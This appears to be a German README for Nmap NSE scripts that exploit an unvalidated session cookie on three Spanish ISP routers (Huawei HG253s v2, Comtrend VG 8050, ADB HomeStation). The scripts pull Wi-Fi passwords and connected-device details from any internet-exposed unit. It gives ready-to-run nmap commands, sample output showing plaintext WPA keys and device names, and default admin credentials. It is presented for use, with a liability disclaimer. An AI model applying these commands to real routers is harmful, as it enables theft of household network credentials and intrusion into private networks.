
Einige NSE-Skripte zum Suchen von Informationen von Routern
Einige NSE-Skripte, um Informationen von Routern abzurufen.
Der Autor dieser Skripte ist VicenDominguez. Er hat die 0-Day-Lücke bei Huawei entdeckt; ich habe sie nur für zwei andere modifiziert.
Der Autor dieses Skripts ist nicht für dessen Verwendung verantwortlich.
#Huawei HG253s v2 Vodafone-Spanien beginnt, einen neuen Huawei HG253v2-Router an spanische Kunden zu vermieten. Dieser neue Router wird mit einer neuen Firmware-Version ausgeliefert.
##Schwachstelle Grundsätzlich wird das Session-Cookie auf einigen Administrations-Webseiten nicht validiert. Daher ist es möglich, von diesen URLs direkte Informationen von jedem Router zu erhalten, der mit dem Internet verbunden ist.
##Verwendung
nmap --script=http-enum-vodafone-hua253s.nse -p80,443 -sS x.x.x.x
Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-vodafone-hua253s:
| SSID: vodafone070 (14:b9:XX:XX:XX:XX) Password: (AES) 123456
| Device: android-246e67b281179679-Wireless MAC: 48:5A:3F:XX:XX:XX IP: 192.168.0.XX
#Comtrend VG 8050 Telefonica-Spanien beginnt, einen neuen Comtrend VG 8050-Router an spanische Kunden zu vermieten. Dieser neue Router wird mit einer neuen Firmware-Version ausgeliefert. Dieser Fehler wurde von DaniLabs gefunden.
##Schwachstelle Grundsätzlich wird das Session-Cookie auf einigen Administrations-Webseiten nicht validiert. Daher ist es möglich, von diesen URLs direkte Informationen von jedem Router zu erhalten, der mit dem Internet verbunden ist.
##Verwendung
nmap --script=http-enum-telefonica-comtrend-vg-8050.nse -p80,443 -sS x.x.x.x
Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-telefonica-comtrend-vg-8050:
| SSID: MOVISTAR_XXX
| Cipher Algorithm: WPA
| Password WEP:
| Password WPA: gTU3NkXE44RYjuM2RrxM
| Password WPA2:
| Device: 192.168.0.X MAC: 5c:97:X:X:X:X IP: 192.168.0.X
#ADB P.DGA4001N a.k.a HomeStation Telefonica-Spanien beginnt, einen neuen ADB P.DGA4001N-Router an spanische Kunden zu vermieten. Dieser neue Router wird mit einer neuen Firmware-Version ausgeliefert. Dieser Fehler wurde von DaniLabs gefunden.
##Schwachstelle Grundsätzlich wird das Session-Cookie auf einigen Administrations-Webseiten nicht validiert. Daher ist es möglich, von diesen URLs direkte Informationen von jedem Router zu erhalten, der mit dem Internet verbunden ist.
Die Standard-Zugangsdaten sind admin / 1234. ##Verwendung
nmap --script=http-enum-telefonica-homestation.nse -p80,443 -sS x.x.x.x
Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-telefonica-homestation:
| SSID: WLAN_HOME
| Cipher Algorithm: WEP
| Device: IphonePedro MAC: A8:8E:24:X:X:X IP: 192.168.1.X